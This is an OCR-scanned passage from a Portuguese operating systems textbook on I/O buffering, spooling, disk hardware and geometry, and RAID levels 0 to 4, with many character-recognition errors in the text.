bem tem um defeito: o que acontccc sc o buffer ć paginado 
para o disco quando um caraclere chega? O buffer pode ha 
ser trancado na memório, mas, sc muitos processos come- 
ęarem a Iraticar paginas na metnória, o conjunto de pagi- 
nas disponfveis dimlnuira e o desempenho caira. 

Urna outra saida seria criar um buffer dentro do mideo 
c ter um tratador de interrupęao colocando os caracteres 
nule, como mostrado na Figura 5.13(c), Quando esse buffer 
esta cheio, a pagina associada ao buffer do usuario e trazida 
para a mernória, se necessario, e o buffer e copiado nela 
em urna só opera ęa o. Esse esquema e bem mais di cienie. 

C out ud o, mesrno esse metodo apresema um próbie- 
ma; o quc ocone com os caracteres quc chegam enquanto 


Processo do usuario 




(a) (b) 



I Figura 5.13 (a) Entrada nao enviada para buffer. (b) Utilizaęao de buffer no espaęo do usuśrio. [c) Utilizaęao de buffer no nucleo, 
seguido da cópia para o espaęo do usu&rio. (d) Utilizaę&o de buffer duplicado no nucleo. 
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a pagina associada ao bu ffer do usuario esta sen do irazida 
do disco para a memória? Visto que o buffer se encomra 
dieto, nao ha espaęo para coloca-ios. Uma saida e man¬ 
ier um segundo buffer no niideo. Quando o primdro buf- 
fcr esta cheio r mas antes de de ser esvaziado, utiliza-se 
o segundo buffer como mostra a Figura 5 J3(d)* Quando o 
segundo buffer esta chrio, cle sc tonią dispomVd para ser 
copiado para o usuario (presummdo que o usuario o len ha 
solidtado). Enąuamo o segundo buffer e copiado para o 
espaęo do usuario, o primdro pode ser usado para os novos 
caracteres. Dessa maneira, os dois buffers irabalham alter- 
nadameme: enąuaoto um esta sendo copiado para o espa¬ 
ęo do usuario, o outro esta acumulando novas emradas. 
Esse lipo dc esquema e chamado de utilizaęao de buffer 
duplicado (double tntfferiwj ). 

Outra forma de annazenamento largamente utiliza- 
da e o buffer circular (circular buffer), que e formado por 
uma regiao da memória e dois pomeiros. Um dos poniei- 
ros aponla para a próxima palavra livre, onde novos dados 
pod cm ser armazenados. O outro aponta para a primeira 
palavra de dados no buffer que ainda nao foi removida. 
Em muitas sitiiaęocs, o hardware avanęa o primeiro pon- 
iciro após a inclusao de novos dados (quc tenham acabado 
dc chegar da rede, por cxemplo) c o sistema operacional 
avanęa o segundo ponteiro após a cxdusao e o proccssa- 
memo dc dados. Ambos os ponleiros passeiam nos dois 
se miel os, retrocedendo quando encomram o topo. 

A utilizaęao de buffer tambem e importante na safda 
de dados. Imagine, por exemplo, a safda feita para o mo¬ 
dem sem a utilizaęao dc buffer, usando o modclo da Figura 
5.13(b). O proccsso do usuario cxcoita uma chamada dc 
sistema wrile para escrever n caracteres. O sistema dispóc 
de duasopęoes nesse momento. Ele pode bloąuearo usua¬ 
rio ate que lodos os caracteres tenham sido escritos — mas 
isso poderia Ievar muito tempo se considerarmos uma li- 
nha lelefónica lenta. Ou tambem poderia liberar o usuario 
imediatamente e fazer a E/S enquanto o usuario processa 
algo mais f mas isso talvez acarrelasse um próbie ma ainda 


muito piór: como fazer o processo do usuario saber que a 
safda foi conciufda e que ele ja pode reutilizar o buffer? 
O sistema poderia gerar um sinal ou uma interrupęao de 
software, mas esse tipo de programaęao e dificil e sujetto a 
condięóes de corrida. Uma soluęao muito melhor ć o nu- 
cleo copiar os dados para um buffer do nucleo, analogo ao 
quc e mostrado na Figura 5.13(c) (mas no outro sentido), e 
imediatamente desbloąuear o processo que chamou. Agora 
nao imporia quando a E/S atual foi conciufda: o usuario 
esta livre para reutilizar o buffer no momento em qite ele 
e desbloąueado. 

A utilizaęao dc buffer e uma tćcnica amplamcnte cm- 
pregada, mas que tambem apresenta uma desvantagem: se 
os dados forem copiados muitas vezes, o desempenlio cai- 
ra. Considcrc, porexemplo, a rede da Figura 5J4. Mela o 
usuario faz urna chamada dc sistema para escrever na rede. 
O nucfeo copia o pacote para o buffer do mi cleo a firn de 
permitir que o usuario prossiga imediatamente {passo 1). 
Neste ponto, o programa do usuario pode reutilizar o 
buffer. 

Quando o driver e requisitado, de copia o pacote para 
o controlador objetivando a safda (passo 2). A razao pela 
qual ele nao transfere da memória do micleo diretamente 
para o barramenio e que, uma vez inicializada a transinis- 
sao do pacote, ela deve cominuar a uma velocidade unifor- 
me. O driver nao pode garantir essa veloddade u ni formę, 
pois os canais dc DMA e os ouuos dispositivos dc E/S po- 
deni estar roubando rnuitos eiclos. Uma fallia na obtenęao 
de uma palavra em algnm momento poderia arruinar o 
pacote. A utilizaęao de buffer para o pacote dentro do con- 
trolador pode evitar esse próbie ma. 

Depois de ter sido copiado para o buffer interno do 
controlador do emissor, o pacote tambem e copiado para a 
rede (passo 3). Os bits chegam ao receptor imediatamente 
após terem sido cmiados, de modo quc, logo após o ultimo 
bit ter sido cnviado, de chega ao receptor, onde o pacote 
deve esiar armazenado no buffer do co ruro I a do r-des lin o* 
Logo cm seguida, o pacote e copiado para o buffer do mi- 



I Figura 5.14 O transito na rede pode enuctver nnuitas cópias de om pacote. 
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cleo do receptor (passo 4), Por firn, ele e copiado para o 
b uff er do processo do usuario-destino (passo 5). Em geral, 
o receptor entao envia de vo!ra uma confirmaęao do rcce- 
bimento. Quando o emissor obtem a confirmaęao, ele fica 
livre para cnviar o próxhno pacotc. Contudo, devc cstar 
daro que loda cssa opcraęao dc cópia vai reduzir consi- 
dcravelmente a taxa dc transmissao, pois todos os passos 
dcvcm ser feitos seątiendalmente, 

Relatório de erros 

Os erros sao bem mais comura durante uma E/S do 
quc cm out ras situaęoes, Quando des oeorrem, o sistema 
operacional deve lidar com des da melhor maneira possf- 
vd. jMuitos erros sao especfficos de di$posiiivo e devem ser 
tratados por dnvers apropriados, mas o modelo do trata - 
niemo de erro nao depende de dispositivo. 

Uma classe dc erros dc E/S e rdarionada aos erros dc 
programaęao, os quais ocorrcm quando urn processo dc- 
seja algo imposswel como escrever cm um dispositivo de 
entrada (teclado, mouse, scanner etc.) on ler dc um dispo- 
sitivo de safda (impressora, plouer etc.). Entre ouiros erros, 
ha o fornedmemo de um endereęo invalido de buffer ou 
outro parametro e a especificaęao de um disposiiivo invali- 
do (por exempIo, o disco 3 qnando o sistema tein somente 
dois discos), A atitude a ser tornada dianie desses erros e 
direta: simplesmente relatar de volta a o processo chamador 
um código de erro, 

Outra classe de erros e a que engloba os erros reais de 
E/S, como, por exempIo, a tematwa de escrever em um 
bloco de disco danificado ou ler de uma camera de vfdeo 
desligada. Nessas circunstandas, iica a cargo do driver de- 
tenninar o que fazer. Se o driver nao sabe como proceder, 
ele pode repassar o próbie ma de voita para o software in- 
dependente dc dispositivo. 

O que esse software faz depende do ambieme e da na- 
tureza do erro. Se o erro e causa do por urna s im pies leiuira 
e existe um usuario interativo dispbnfvd, ele pode exibir 
no vidco uma caixa de dialogo perguntando ao usuario o 
que fazer. Etitre as opęoes estao desde um certo numero de 
temativas, ignorandoo erro, ate niatar o processo que emi- 
tiu a chamada, Se nao exisic nenliuiri usuario interativo 
disponwd, provavcl menie a u ni ca opęao real seja relatar 
um código dc erro indicando uma fal ha na chamada dc 
sistema. 

Comudo, alguns erros nao podem ser tratados desse 
modo. Por exempIo, uma estru tura de dados crttica, como 
o diretório-raiz ou uma lista dc blocos livres, pode ter sido 
destrutda. Nesse caso, o sistema pode ter de emitir no vfdeo 
uma mensagem dc erro e se desligar. 

Alocacao e liberaęao de dispositwos dedicados 

Alguns dispositivos, como gravadores de CD-ROM, $6 
podem ser u sad os por um unico processo em um dado mo- 
niemo. O sistema operacional deve ser capaz de examinar 


as requisięÓes de uso do dispositivo, podendo aceita-Ias ou 
rejeita-las, dependendo da disponibilidade do dispositira. 
Uma maneira simples de tratar essas requisięoes ć fazer 
com que os processos executem diamadas de sistema open 
para a abertura dc arquivos espedais, que sao associados 
diretamente a os dispositivos. Sc o dispositivo nao esta dis- 
pomvd, o open falha. Com isso, o fechanicnto desse dispo- 
sitivo dcdicado implica su a libera ęao, 

Uma estrategia alternativa e ter mecanismos espedais 
para a reąuisięao e liberaęao de dispositivos, Tentar adqui- 
rir um dispositivo quc nao esteja dispomvet bloąueia o pro¬ 
cesso chamador em vcz dc causar uma falha. Os processos 
bloqueados sao colocados em uma fila, Mais cedo ou mais 
lardc, o dispositivo solicitado torna-sc dispomvcl c ao pri- 
mciro processo da fila e dado o di rei to dc adquirir o dispo- 
sitivo e prosseguir em sua execuęao, 

Tamanho de bloco independenfe de dispos1tivo 

Dis cos difercnlcs podem ter tamanhos di feren dados 
para os setores, Fica a cargo do software i ud opernicnie 
de disposUivo estonder esse deiaihe e fornecer um tama¬ 
nho de bloco uni formę para as camadas superiores — por 
exemplo, iratando varios setores como um unico bloco 16- 
gico. Desse modo, as camadas superiores lidam apenas com 
dispositivos abstratos, que u sam, sem exceęao, o mesmo 
ta ma nlio dc bloco lógico, independentemente do ta ma¬ 
nilo do setor ffsico. Da mesma maneira, alguns dispositi- 
vos de caractere entregam seus dados um by te de cada vez 
(por exemplo, o modem), enąuanto outros entregam seus 
dados em imidades maiores (por exemplo, interfaces de 
rede). Essas diferenęas tambem podem ser ocultadas. 

5.Ł4I Software de E/S do espaco do 
usuario 

Embora a maior parte do software de E/S esteja dentro 
do sistema operacional, inna pcquena parte dcle ć cons- 
tituida de bibliotccas ligadas aos progiamas do usuario e 
ale mesmo de progratnas completos que executam fora do 
mkleo, As chamadas de sistema, incluimio as chamadas 
de E/S, normalnienie sao feitas por rotinas de bibliotecas, 
Q u and o um programa escrito em C contem a chamada 

contador = writeffd, buffer, nbytes): 

a roli na de biblioteca write sera ligada com o programa e 
estara contida no programa binario presente na memória 
no tempo de execuęao. O conjunto de Lodas essas rotinas 
de biblioteca e nitidamente parte do sistema de E/S. 

Enquanto essas rotinas fazem pouco mais do que colo- 
car seus parametros no local apropriado durantc uma cha¬ 
mada dc sistema, cxistem outras rotinas de E/S que rea- 
lizam trabalho de verdade. Em panicular, a formataęao de 
entrada e safda e fcita por rotinas de biblioteca. Um exem- 
plo de Cen comando printf, que recebe uma cadeia de ca- 
racieres e possivdniente algumas variaveis como entrada. 
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co ustroi oma cadeia de caracieres em código ASCII e entao 
chama o write para coioca-la na saida. Como um exemplo 
de printf, considere o comando 

printff'0 quadrado de %3d e %6d\ri\ i, i + i); 

Nesse exemplo, cle fonnata oma cadda de caracteres 
consiitutda dc 14 caracteres, "O quadrado de", scguida pclo 
valor de i como uma cadda dc Ires caracteres, mais a ca dci a 
de irćs caracteres * eh ", mais i 2 como uma cadda de seis ca- 
racieres e, por ultimo, mais um caractere da linha seguinte. 

Um cxemplo de roiina similar para a emrada de dados 
ć o scanf que le uma emrada e a armazena em variavcis 
descritas cm um formato de cadcia de caracteres usando 
a mesma simaxe como printf. A biblioicca-padrao de E/S 
eon te ni uma serie dc rotinas quc cnvolvem E/S c todas 
exccutam como parte dos programas do usuario. 

Nem todo software dc E/S no nivel do usuario eon- 
sistc cm rotinas de bibliotece. Oulra categoria importantc 
e o sislema dc spooling, O uso dc spool e uma mancira 
de lidar com disposUivos dedteados de E/S eni sistemas de 
muliiprograniaęao. Tomemos um dispositivo tipico capaz 
de trabaihar com spool: uma impressora* Embora fosse lec- 
nicameme facil deixar qualquer processo do usuario abrir 
o arquivo espedal de caractere para a impressora, suponha 
que um processo o abriu e nao fez nada durante horas. Du- 
rante esse tempo, nenhum outro processo pode imprimir 
qualquer coisa. 

Em lugardisso, c criado um processo espedal cha mado 
de daemon, e um diretório espedal, chamado de diretório 
de spool. Para imprimir um arquivo, um processo gera pri- 
meiro todo o arquivo a ser impresso c o coloca no direlório 
de spool Fica a cargo do daemon — o unico com permissao 
para usar o arquivo especial da impressora — imprimir os 
arquivos no diretório. Protegendo o arqulvo espedal contra 
o accsso direto pelos usuarios, o problcma de haver alguem 
mantendo-o desnecessariamente aberto e eliminado. 

O spool nao e usado somente para impressoras. Por 
exemplo, a transfcrencia dc arquivo sobre uma redc mui- 
tas vezes emprega um daemon de rede. Para eiwiar um 
arquivo para algom lugar, o usuario coloca o no diretório 


de spool da rede. Posteriormeme, o daemon da rede retira- 
-o do diretório e o trausmite. Um uso especffico da trans- 
missao de arquivos via spool e feito pelo sislema USENET 
News. Essa rede consistc cm milhoes dc maąuinas ao redor 
do numdo em eon tato via Internet. Ha milhares de grupos 
news sobre diversosassumos, Para colocaruma mensagem, 
o usuario invoca o programa news, quc aceita a mensagern 
a ser postada e entao a deposlta no spool para depois trans- 
miti-la para outras maąuinas. Todo o sislema nem executa 
fora do sislema opera ci ona 1. 

A Figura 5J 5 resume o sistema de E/S, mostrando u>- 
das as camadas c as ftmęoes prindpais dc cada uma ddas* 
Comeęando pela ca ma da de mais baixo nfvel, teinos o hard¬ 
ware, os tratadores dc interrupęao, os drivers dos dispositi- 
vos, o software independente de dispositivos e, por firn, os 
processos do usuario. 

As setas na Figura SU5 most ram o fluxo dc conlrolc* 
Quando, por exemplo, um programa do usuario renta Icr 
um bloco de um arquivo, o sistema opcracional e requi- 
sita do para realizar a cha mada. O software independente 
de dispositivo procura pclo bloco na ca che do buffer, por 
exemplo. Se o bloco reąuisitado nao esta la, ele chama o 
driver do dispositivo para emitir uma reąuisięao a (Im de 
que o hardware o obtenha do disco* O processo ć entao blo- 
qneado ate que a operaęao do disco tenha sldo concluida. 

Quando o disco termina, o hardware gera uma inter- 
rupęao. O tratatlor de interrupęao e executado para des- 
cobrir o que aconteceu — isto e, qual dispositivo esta re- 
qucrcndo alenęao naquek momento, Ele entao obtem o 
status do dispositivo e acorda o processo que estava dor* 
mindo para finalizar a requisięao de E/S e deixa o processo 
do usuario prosseguir sua execuęao. 


5.4 


Agora passaremos a cxaminar alguns dispositwos reais 
de E/S, comeęando com os discos — qne sao conceittial- 
mente simples, mas muito importantes. Em seguida examh 
naremos relógios, teclados e monitores. 


Camada 


Resposta 
de E/S 


Requisięao 
de E/S 


*1 

Processos do usuśiio ^ 

1 | 

1 

r Soflware independanie 
de disposilivo i 

' 

r Drlveis dos 

diSpOSitivOS i 


Tratadores de 1 

interrupęao i 


1 

Hardware 


Funęoes de E/S 
Chama E/S: fermata E/S: coloca no spool 

Nomoaęao, proteęio, bloquoio. uttlizaęSo de pulfer o alocaęgo 
Aj u sta os rogistradoros do disposMwo: verifica status 
Acorda driveF quando a E/S esta completa 
Executa operaęao de E/S 


I Figura 5.15 Camadas do sistema de E/3 e as principais funęoes de cada camada, 
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5-4.11 Hardware do disco 

Hxiste unio gran dc varicdade dc lipos dc discos, Os 
mais comuns sao os discos magneticos (discos ngidos c fle- 
xfveis), cara ci er i zad os pele fato de que lamo leituras qua li¬ 
to escritassao igualmerite rapidas, tornando-os ideais para 
memórias secundarias (paginaęao, sisiemas dc arquivos 
etc.). Arranjos desses discos mnitas vezes sao empregados 
para fornecer urn armazenamemo a] ta men te confiavd. 
Para a distribuięao de programas, dados e filmes, vańos li¬ 
pos de discos ópticos (GD-ROMs, CDs gravaveis e DVDs) 
tambem sao imporianies. Nas seęoes seguintes, descreve- 
remos primeiro o hardware e, entao, o software para esses 
disposilivo$, 

Discos magneticos 

Os discos magneticos sao organizados em cilindros; 
cada cilindro contem tantas iriihas ąuanto forem os cabe- 
ęotes dispostos Ycriicalmente* As trillias sao divididas cm 
setores, e o nu mero de setores ao redor da circunferencia 
geralmente vai de S a 32 nos discos flexfveis e ate varias 
centenas nos discos ngidos. O mi mero de cabeęotes varia 
dc 1 a 16. 

Os discos mais amigos icm pouca cleir6nica e Iransmi- 
tem somente um fluxo simples e serial de bils. Nesses discos, 
o comrolador faz a maior parte do irabalbo, Ern outros, cm 
partia]lar nos discos IDE (integrated drm tfetronies — ele- 
tronica integrada ao disco) e SATA (serki ATA — ATA 
serial), a própria unidade de disco contem um microcon- 
trolador que realiza parie do servięo c permite que o con- 
trolador rcal cmiia um eonjunto de comandos de alio ut¬ 
yci, O controlador costuma ser responsavd por eonLrolar a 
caehe, remapear blocos defeituosos c muilo mais. 


Urna caracteristica do dispositivo, a qual apresenta im- 
plicaędes importantes para o driver do disco, e a possibill- 
dade de o controlador fazer posicionamentos simnltaneos 
cm duas on mais nnidades de disco, conheddos como po- 
sicionamentos simultaneos (overlapped seeks], Enquan.to 
o controlador c o software estao esperando pcla finaiizaęao 
dc um posidonamento cm um disco, o controlador pode 
comcęar um posidonamento em outro disco, Muitos eon- 
troladores sao, ainda, capazes de ler ou escrever em um 
disco enquaiuo tentam se posidonar em um outro ou mais 
discos, mas um controlador de disco flexivel nao pode ler 
ou escrever em dois discos a o mesmo tempo. (A leli tira o u 
a escrita requer que o comrolador mova bits em uma es- 
cala de tempo em ps, de modo que uma transferenda usa 
quase todo seu po der dc compiitaęao.) A simaęao ć dife- 
rente para discos rigidos com comroladorcs integrados, e 
cm um sistema com mais dc um desses discos ngidos, clcs 
podem operat simultancamente, pelo menos ate o porno 
dc transferenda entre o disco e o buffer de inemória do 
controlador, Emretanto, somente uma iransferencia en- 
ire o controlador e a memória principal e posswel em um 
mesmo tempo. A habilidade para executar duas ou mais 
operaęóes simultaneas pode reduzir consideravelmente o 
tempo medio de acesso. 

A Tabela 5.3 eompara parametros dc uma midia dc 
armazenamento padrao para o PC IBM original com pa¬ 
rametros de um disco ngido moderno, com o objęlivo de 
mostrar o gra u de evoluęao dos discos em duas decadas, 
E inieressanie notar que nem lodos os parametros tern 
apresentado melliorias consideraveis. O lempo medio de 
posidonamento esta sete vezes melhor e a faxa de transfe¬ 
renda esta 1.300 vezes melhor, ao passo que a ca pad da de 
apresentou um rndicc de aumento de 50 mil. Esse padrao 


Pa rś metro 

Unidade de disquete IBM PC 360 KB 

Disco rigido Western Digital WD 18300 

Numero de cilindros 

40 

10601 

Trilhas por cilindro 

2 

12 

Setores por trilha 

9 

281 (em media) 

Setores por disco 

720 

35742000 

Bytes por setor 

512 

512 

Gapacidade do disco 

360 KB 

18,3 GB 

Tempo de busca {cilindros adjacentes) 

6ms 

0,8 ms 

Tempo de busca {em media) 

77 ms 

6,9 ms 

Tempo de rotaęao 

200 ms 

8,33 ms 

Tempo para parada/inicio do motor 

250 m$ 

20 ms 

Tempo de transferenda de um setor 

22 ms 

17 ps 


I Tabela 5.3 Parametros de disco para a unidade de disquete do IBM PC 360 KB e para o disco ngido do Western Digital WD 18300, 
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mosira qiie as progressos foram rdativamente graduais nas 
partes móveis e muito mais expressivos nas densidades de 
bits das superficies de gravaęao. 

Ao olharmos para as especifkaęoes dos discos rigidos 
modernos, precisamos tera eonsciencia de que a geometria 
especificada, usada pelo driver, pode ser diferente daquela 
do forma i o ffsico. Nos discos antigos, o niimcro de seiores 
por trilha era o mesmo para todos os dlmdros. Os discos 
modernos sao divididos cm zonas, das quais ha mais setores 
nas zonas mais exLernas do que nas zonas mais imernas. A 
Figura 5.16(a) ilusira urn disco pequeoo com duas zonas, 
A zona mais extcma tein 32 seiores por trilha; a zona mais 
imerna tein 16, Um disco real, como o WD 18300, rnuitas 
vezes tem 16 ou mais zonas, com o numero de setores au- 
mentando cerca de 4 por cento por zona ao ir da zona mais 
interna para a zona mais externa. 

Para oculiar os deialhes de quantos seiores cada trilha 
possui a maioria dos discos modernos tem urna geometria 
virtual quc e aprescnlada ao sistema opcracional O soft¬ 
ware e insiruido para agir coino se existissem A cilindros, y 
cabeęoies e z setores por tri] ha. O controlador en tao rema- 
peia nma requisięao (x t y, z) cm um posicionamento real dc 
cilindro, cabeęote c setor. Urna posswel geometria virtual 
para o disco lisico da Figura 5.1ó(a) e most rada na Figura 
5. 1 ó(b) . Em ambos os casos, o disco tern 1 92 seiores, só que 
a organizaęao publicada e diferente da organizaęao real, 
Para os PCs, os valores maximos para esses tres para- 
metros sao rnuitas vezes (65535, 16 e 63), em virtude da 
neccssidade dc se mam erem compatwds com as limitaęoes 
do IBM PC originai. Nessa maąuina foram usados campos 
de 16, 4 e 6 bits para especificar esses numeros, com os 
rilindros e seiores e nu mera dos a partir de 1 c os cabeęo- 
les e nu me rad os a partir de 0, U san do esses para metros e 
considcrando 512 bytes por setor, o maior disco posswel c 
dc 31,5 GB. Para superar esse Ihnitc, muitos discos agora 
su por tam um sistema cha mado de endereęamento lógi- 
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co de bloco (logicai błock addressing - LBA), no qual os 
setores do disco sao simplesmente e numer a dos consecuti- 
vamente a partir de 0, sem considerar a geometria do disco. 

RAID 

O desempenho da CPU tem au men lado ejcponencial- 
meme nas ultimas decadas, sendo basicanieme duplicado 
a cada 18 meses. O mesmo nao tem ocorrido com o de- 
sempenbo dos dispositkos dc disco. Na decada dc 1970, 
os tempos tnedios de posicionamento nos discos dos mmi- 
computadores variavam de 50 a 100 ms. Atualmente, esses 
tempos atingem pouco menos de 10 ms. Na maioria das in- 
dustrias tecnológicas (digamos, automobilistica ou de avia- 
ęao), um fator de 5 a 10 na melhora do desempenho em 
duas decadas seria urna notfcia hnporiame fimagine carros 
dc 300 mpg), mas na industria de computadores isso cum 
verdadciro fiasco. Assim, a difercnęa entre os desempenhos 
da CPU e dos disposiiivos de disco tem se acentuado com o 
passa r dos a nas. 

Vimos que o processamenlo paralelo esta sendo cada 
vez mais usado para acelerar o desempenho da CPU. Da 
mesma manerra, esse fata tem feito muitos acreditarem 
que a E/S paralela tambem possa ser urna boa ideia. Em 
umartigo de 1998, Patterson et al. sugeriram scis organiza- 
ęócs especificas para os discos, as quais poderiam ser usadas 
para mclhorar o desempenho c a confiabilidade dos discos 
ou ambos (Patterson et al, 1998). Essas ideias foram ra~ 
pidamentc adotadas pela industria u levaram a u ma nova 
classc dc dispositivos dc E/S, chamada de RAID. Patterson 
et al definiram RAID como um arranjo redundante de 
discos baratos {redundtmt array ofinexpemive dhks), mas a 
industria redefmiu o I como 'Indcpendentc' em vcz de "Ba¬ 
ra to' (talvez assim des pudessem usar discos mais caros?). 
Vrsto que foi novamcntc necessaria a cxistencia dc um vi- 
lao {como, no caso, RISC versus CISC, tambem por Patter- 
son), o ma u sujeilo nesse caso foi o disco unico grandę e 
car o (single Lirge expemm disk — SUED). 



(b) 


i Figura 5.16 (a) Geometria fisica de um disco com duas zonas. (t>) Uma possivei geometria virtua] para esse disco. 
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A ideia basica em lorno do RAID e instalar unia cai- 
xa cheia de discos próxima ao computador (em geral, um 
grandę servidor), substituir a płaca eontroladora de disco 
por um comrolador RAID, copiar os dados para o RAID e 
entao prosseguir coni a opcraęao normal. Em outras pa- 
lavras, para o sistema operadonal um RAID dcveria pa- 
recer-se com um SLED, oferccendo, entretanto, md hor 
desempenho c confiabilldade. Visto que os discos SCSI leni 
bom desempenho, baixo preęo e capaeidade de permltir a te 
sete di$posiiivos em um unico comrolador (15 paw SCSJs 
maiores), e natural que a niaioria dos RAIDs consisia em 
u m unico comrolador RAID SCSI mais u ma caixa de dis¬ 
cos SCSI que sao vistos pelo sistema operacionał como um 
linko disco grandę. Dessa maneira, nenhuma alteraęao no 
software c necessaria para usar RAID, o que implica urna 
grandę vantagem comercial para a maioria dos administra- 
dores dc sistemas. 

Alem disso, para parecer-se com um unico disco para 
o software, todos os RAJDs tern a propriedade de os da¬ 
dos serem distriluudos pelos dispositivos, permitindo ope- 
raęoes em paralelo. Varios diferentes esquemas para fazer 
isso foram defmidos por Paiterson ci al., sendo chamados 
dc RAID nivel 0 a RAID mvcl 5. Existcm tambem alguns 
outros mveis sccundarios que nao discutiremos aqui. O ter¬ 
mo 'nivel' e 11111 tanio impróprio, visto quc nenhuma hic- 
rarąuia esta envolvida; cxistem simplesmente scis possweis 
organizaęoes diferentes, 

O RAID nivel 0 e ilustrado na Figura S.17{a). Ela pos- 
sibilita a visuaiizaęao de um unico disco vimial simulado 
pelo RAID, dividido em faixas de k setores cada um, em 
quc os setores dc 0 a k - 1 estao na faixa 0, os setores dc 
k a 2 k- I estao na faixa i e assim por dianie. Para k - \, 
cada faixa equivak a um unico setor; para k = 2, cada faixa 
equivale a dois setores, e assim por dianie, A organizaęao 
do RAID nfvel 0 grava as Iaixas consecutwas nos discos em 
um esiilo de aiternaneia drcular (round-robit}) t como nios- 
trado na Figura 5.17(a) para um RAID com quatro discos. 

A distribuięao dos dados sobrc varios discos, como 
mostrado na figura, e chamada dc striping. Por cxemplo, 
se o software emilir um comando para ler um bloco de 
dados que seja constitmdo de quairo faixas consecutwas, 
o comrolador RAID ąuebrara esse comando em quatro 
comandos separados, um para cada um dos quatro discos, 
opera udo, assim, em paralelo. Teremos entao E/S paralela 
sem que o software saiba desse fato. 

0 RAID nivd 0 trabalha melhor com reąuisięoes maio- 
res c, ąuanto maior, md hor. Sc urna rcquisięao for maior 
que o produto do mi mero de discos pelo ta ma n ho da fai- 
xa, alguns discos receberao reąuisięoes muiliplas, de modo 
quc, quando terminam a primeira reąuisięao, des iniciam 
a segunda. Fica a cargo do comrolador partira reąuisięao, 
gerar os comandos correios para os discos apropriados na 
seąuencia certa e, entao, reorganizar os resultados correta- 
mente na memória. O desempenho e exceleme e a imple- 
mentaęao e direta. 


O RAID mvel 0 lem desempenho interior com sistemas 
operacionais que requisitam dados de um setor por vez. Os 
resultados sao corretos, mas nao cxiste paralelismo e, por¬ 
ta nto, nenhum ganho dc desempenho. Outra desvantagcm 
dessa organizaęao e que a conliabilidade ć potencialmente 
menor do que quando se tern u ni SLED, Se um RAID e 
constkuido de ąuatro discos, cada um com um tempo me¬ 
dia de falha de 20 mil horas, a cada ciii co mil horas um 
disco falhara e todos os dados serao com pieta mente per- 
didos, Um SLED com um tempo medio de falha de 20 mil 
horas seria quntro vczcs mais confiavel. Em virmdc da falta 
de redundancja nesse projeto, ele nao e dc fato um RAID. 

A opęao seguinte — o RAID mvel 1 —, mostrada na 
Figura 5.17{b), e Lima verdadeira organizaęao RAID, dupli- 
caiido todos os discos, de modo que existam qnarro discos 
prima nos e ąuatro discos de capia dc seguranęa (backups). 
Durame u ma escrita, cada faixa e escrita duas vezcs. Du- 
rante urna ldtura, qualquer unia das duas copias pode ser 
usada, distribuindo a carga em mais discos, Conscqueme- 
mente, o desempenho da escrita nao e melhor que o em- 
prego de unia unica cópia de cada disco, mas o desempe- 
nho da leitura pode ser ale duas vezes methor. A tolerancia 
a faihas c excelente: sc um disco ąuebra, a cópia ć simples- 
mente usada no lugar. A recuperaęao consiste apenas em 
i ustala r um novo disco, transferindo para ele loda a cópia 
de seguranęa, 

Diferentemente dos mveis Del, que trabalham com 
faixas de setores, o RAID mvcl 2 trabalha com palavras e 
muitas vezes com bytes. Imaginem ąuebrar cada byle de 
um unico disco vimial em um par de pedaęos de 4 bits 
cada, adicionando em cada pedaęo o código de Hamming 
para formar urna palavra de 7 bits, dos quais os bits 1, 2 e 
4 sao bits de paridade. Melhor ainda imaginar que os sete 
discos da Figura 5,17(c) foram sineronizados ąuanto a o po- 
sidonamento do braęo e a rotaęao. Entao, seria posswcl 
escrever urna palavra dc 7 bits codificada com Hamming 
sobrc os sete discos, um bit por disco. 

O computador CM -2 da Thinking Machines usava esse 
esąuema, tomando palavras de 32 bits e adicionando ó 
bits de paridade para formar urna palavra de 38 bits com 
Hamming, mais u ni bit exira para a paridade da palavra, 
e distribufa cada palavra nos 39 discos. O ganho total no 
desempenho era imenso, pois, durante o mesrno tempo de 
acesso a um setor, ele poderia escrever 32 setores de dados, 
Alem disso, a perda de um disco nao causava próbie mas, 
pois isso signiftcava perder um bit em cada lei tura de u ma 
palavra de 39 bits, algo que o código de Hamming poderia 
iratar facilmenie, sem a necessidade de parada do sistema. 

A desvantagcm e que esse esąuema reąitcr que todos 
os discos ten barn suas rotaęóes sineronizadas c somente 
tern sentido se usado com um numero substandal de dis¬ 
cos (mesrno com 32 discos de dados e scis discos de parida¬ 
de, a s ab re carga ca usada por codificaęao de paridade e dc 
19 por cento). Ele tambem exlge bastante do comrolador, 
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visto que e necessario fazer a verificaęao de erro do código 
Hamming a cada chegada de bil. 

O RAJD nfvel 3 ć unia vcrsao simplifkada do RAID 
mVd 2, Ele c ilustrado na Figura 5.17(d). No presente taso, 
urn unico bil de paridade e compiuado para ca da palavra 
de dados, sendo escrilo em urn disco de paridade. Assim 
como no RAID nfvel 2, os discos devem estar perfeiiameme 
sincromzados, visio que as palavras de dados individuais 
sao disiribufdas nos varios discos. 


Em unia primeira analise, pode parecer que um tinico 
bit de paridade permite somente a detecęao do erro, e nao 
sua correęao. Para o caso de erros aleatórios nao detecta* 
dos, essa observaęao e vaUda. No emanto, para o caso de 
urna ąuebra dc disco, dc pcunitc a correęao co ni pieta do 
erro de um bit, visto que a posięao do bit danifkado c co- 
nhecida, Se o disco ąuebra, o controlador simplesmente 
supóe de i nici o quc lodos os seus bits sao 0. Se urna palavra 
apresema um erro dc paridade, o bit do disco ąuebrado 
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] Figura 5.17 RAID nfveis 0 a 5. Os discos de cópia de seguranęa e paridade estlo sombreados. 
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deve ter skio l em vez de 0, de modo que eJe e corrigido. 
Embora ambos os RAIDs nfveis 2 e 3 forneęam taxas mu i to 
a Itas de dados, o n u mero de reąu isięoes dc E/S scparadas 
por segimdo que eles podem traiar nao e md hor do quc 
para um tinico disco. 

Os RAIDs mvcis 4 e 5 trabalham novamente com fai- 
xas em vez de palavras individuais com panda de, nao ne- 
cessitando que os discos estejam si ner on Iza d os. O RAID ni- 
vel 4 [veja a Figura 5.17(e)] e similar ao RAID mvd 0, mas 
com a paridade entre as faixas escritas em um disco extra. 
Por exemplo, se cada faixa tem k bytes de tamanlio, todas 
as faixas sao proccssadas jumas por meio de um OU EX- 
CLUSIVQ, resultando em urna faixa de paridade de k bytes 
de tamanho. Se um disco quebra, os bytes perdidos podem 
ser recaleulados a parlir do disco de paridade por meio da 
leilura de lodo o conjunto de discos, 

Essa organizaęao protege contra a perda de um disco, 
mas nao funckma tao bem para pequenas atualizaęoes* Se 
u ni scior sofre alteraęao, ć necessario !er Lodos os discos 
para recalcular a paridade, que deve, entao, ser reescrita. 
De inaneira alternativa, da pode ler os dados antigos do 
